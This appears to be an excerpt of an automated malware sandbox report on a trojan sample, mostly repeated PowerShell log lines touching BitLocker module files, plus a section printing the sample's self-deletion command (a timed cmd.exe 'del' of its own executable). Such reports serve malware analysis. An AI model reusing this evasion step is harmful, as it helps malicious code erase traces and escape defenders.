    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Self deletion via cmd or bat file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
